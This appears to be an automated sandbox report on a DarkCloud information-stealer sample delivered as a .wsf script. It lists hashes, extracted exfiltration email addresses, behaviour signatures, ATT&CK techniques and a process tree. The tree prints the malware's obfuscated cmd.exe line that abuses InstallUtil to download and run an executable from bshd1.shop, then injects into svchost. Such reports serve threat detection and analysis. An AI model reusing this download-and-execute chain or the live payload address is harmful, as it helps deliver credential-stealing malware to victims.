darkcloud | 866019641f3374234b67045e063ec6514e811f1636e49b9bc3d54441bb4a6741

General

Target

SOA_XSL.wsf
Size

795B
MD5

644ca3a3f10afbeab56d93ce4ad7f0ba
SHA1

ef5dcb8a6e1a1152d116411f784a609c8f870a0a
SHA256

377180ae7109057e5f8403307834211a4c75a584be3090552cb059e52bf4a192
SHA512

da09d35e3dabf0f4c4d541b0322ca1e2600522d7d41abc6adf04d568a58af8a98e89bbcd83a67869e1becaf6fda412aaf0762f1465e47faceaf06293d1db27ea

Score

10^/10

darkcloud stealer

Malware Config

Extracted

Family

darkcloud

Attributes

email_from
igor.bos@vinoterra.ru
email_to
office.tony39@mail.ru

Signatures

DarkCloud
An information stealer written in Visual Basic.
stealer darkcloud
Downloads MZ/PE file
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

WScript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\Control Panel\International\Geo\Nation WScript.exe
Executes dropped EXE 1 IoCs

Processes:

file532024[1].exe

pid process

4444 file532024[1].exe
Loads dropped DLL 2 IoCs

Processes:

InstallUtil.exe

pid process

1484 InstallUtil.exe
1484 InstallUtil.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\Control Panel\International\Geo\Nation	WScript.exe

pid	process
4444	file532024[1].exe

pid	process
1484	InstallUtil.exe
1484	InstallUtil.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\6WJSJ70T\file532024[1].exe	autoit_exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

file532024[1].exe

description pid process target process

PID 4444 set thread context of 2940 4444 file532024[1].exe svchost.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	pid	process	target process
PID 4444 set thread context of 2940	4444	file532024[1].exe	svchost.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

Processes:

rundll32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	rundll32.exe

Modifies registry class 16 IoCs

Processes:

rundll32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Content	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Content\CachePrefix	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Content\CacheLimit = "51200"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Cookies\CacheLimit = "1"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\History\CacheLimit = "1"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Cookies\CacheVersion = "1"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\History\CachePrefix = "Visited:"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\History\CacheVersion = "1"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Content\CacheVersion = "1"	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Cookies	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\History	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\MuiCache	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Extensible Cache	rundll32.exe

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

file532024[1].exe

pid process

4444 file532024[1].exe
Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

rundll32.exe

pid process

3336 rundll32.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

svchost.exe

pid process

2940 svchost.exe

pid	process
4444	file532024[1].exe

pid	process
3336	rundll32.exe

pid	process
2940	svchost.exe

Suspicious use of WriteProcessMemory 22 IoCs

Processes:

WScript.execmd.exerundll32.execonhost.exefile532024[1].exe

description	pid	process	target process
PID 1208 wrote to memory of 768	1208	WScript.exe	cmd.exe
PID 1208 wrote to memory of 768	1208	WScript.exe	cmd.exe
PID 768 wrote to memory of 1268	768	cmd.exe	DeviceCredentialDeployment.exe
PID 768 wrote to memory of 1268	768	cmd.exe	DeviceCredentialDeployment.exe
PID 768 wrote to memory of 3336	768	cmd.exe	rundll32.exe
PID 768 wrote to memory of 3336	768	cmd.exe	rundll32.exe
PID 3336 wrote to memory of 628	3336	rundll32.exe	rundll32.exe
PID 3336 wrote to memory of 628	3336	rundll32.exe	rundll32.exe
PID 768 wrote to memory of 1484	768	cmd.exe	InstallUtil.exe
PID 768 wrote to memory of 1484	768	cmd.exe	InstallUtil.exe
PID 768 wrote to memory of 1484	768	cmd.exe	InstallUtil.exe
PID 768 wrote to memory of 2332	768	cmd.exe	cmd.exe
PID 768 wrote to memory of 2332	768	cmd.exe	cmd.exe
PID 768 wrote to memory of 1952	768	cmd.exe	conhost.exe
PID 768 wrote to memory of 1952	768	cmd.exe	conhost.exe
PID 1952 wrote to memory of 4444	1952	conhost.exe	file532024[1].exe
PID 1952 wrote to memory of 4444	1952	conhost.exe	file532024[1].exe
PID 1952 wrote to memory of 4444	1952	conhost.exe	file532024[1].exe
PID 4444 wrote to memory of 2940	4444	file532024[1].exe	svchost.exe
PID 4444 wrote to memory of 2940	4444	file532024[1].exe	svchost.exe
PID 4444 wrote to memory of 2940	4444	file532024[1].exe	svchost.exe
PID 4444 wrote to memory of 2940	4444	file532024[1].exe	svchost.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SOA_XSL.wsf"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1208

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" "/C DeVIceCREDeNTIalDeploymeNt.eXe & RUNdLl32 inEtCPL.cpL , ClearMyTracksByProcess 8 && C:\Windows\MicrosoFT.nEt\frameWORK\v4.0.30319\inStallUtIL https://bshd1.shop/ljeCUBbq/file532024.exe && tiMeoUT /t 7 /NOBrEak > nuL & fOR /f %A in ( ' dIR C:\Users\Admin\AppData\Local\MICrOsOFT\WinDOWS\INETCAChE\IE\ /S /b ' ) Do cONHosT %A"
2⤵
- Suspicious use of WriteProcessMemory
PID:768

C:\Windows\system32\DeviceCredentialDeployment.exe
DeVIceCREDeNTIalDeploymeNt.eXe
3⤵
PID:1268

C:\Windows\system32\rundll32.exe
RUNdLl32 inEtCPL.cpL , ClearMyTracksByProcess 8
3⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3336

C:\Windows\system32\rundll32.exe
C:\Windows\system32\rundll32.exe C:\Windows\system32\inetcpl.cpl,ClearMyTracksByProcess Flags:8 WinX:0 WinY:0 IEFrame:0000000000000000
4⤵
- Modifies registry class
PID:628

C:\Windows\MicrosoFT.nEt\frameWORK\v4.0.30319\InstallUtil.exe
C:\Windows\MicrosoFT.nEt\frameWORK\v4.0.30319\inStallUtIL https://bshd1.shop/ljeCUBbq/file532024.exe
3⤵
- Loads dropped DLL
PID:1484

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dIR C:\Users\Admin\AppData\Local\MICrOsOFT\WinDOWS\INETCAChE\IE\ /S /b
3⤵
PID:2332

C:\Windows\system32\conhost.exe
cONHosT C:\Users\Admin\AppData\Local\MICrOsOFT\WinDOWS\INETCAChE\IE\6WJSJ70T\file532024[1].exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:1952

C:\Users\Admin\AppData\Local\MICrOsOFT\WinDOWS\INETCAChE\IE\6WJSJ70T\file532024[1].exe
C:\Users\Admin\AppData\Local\MICrOsOFT\WinDOWS\INETCAChE\IE\6WJSJ70T\file532024[1].exe
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4444

C:\Windows\SysWOW64\svchost.exe
C:\Users\Admin\AppData\Local\MICrOsOFT\WinDOWS\INETCAChE\IE\6WJSJ70T\file532024[1].exe
5⤵
- Suspicious use of SetWindowsHookEx
PID:2940

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\6WJSJ70T\file532024[1].exe
Filesize
1.3MB

MD5
99332016403c66ac129b2ab34e97b0ed

SHA1
37c0df4ea5fa74972be7619094081dc726cbf665

SHA256
3116fd6a924c1f827b67fbf721d6be3ba1ac8a71da15a6dff5548cfce2231650

SHA512
351e06565a3e2f8e227dc8f404c5e368553643540f0f9349d780e0973f89be95b1cb286498b42c2851bdc2094032554268d50b0f165548704ef6ecacbb5da00e

Download Submit
memory/1484-0-0x0000000000510000-0x000000000051C000-memory.dmp

Filesize
48KB

Download
memory/1484-1-0x0000000000F30000-0x0000000000F4A000-memory.dmp

Filesize
104KB

Download
memory/2940-28-0x0000000000400000-0x0000000000460000-memory.dmp

Filesize
384KB

Download
memory/2940-29-0x0000000000400000-0x0000000000460000-memory.dmp

Filesize
384KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads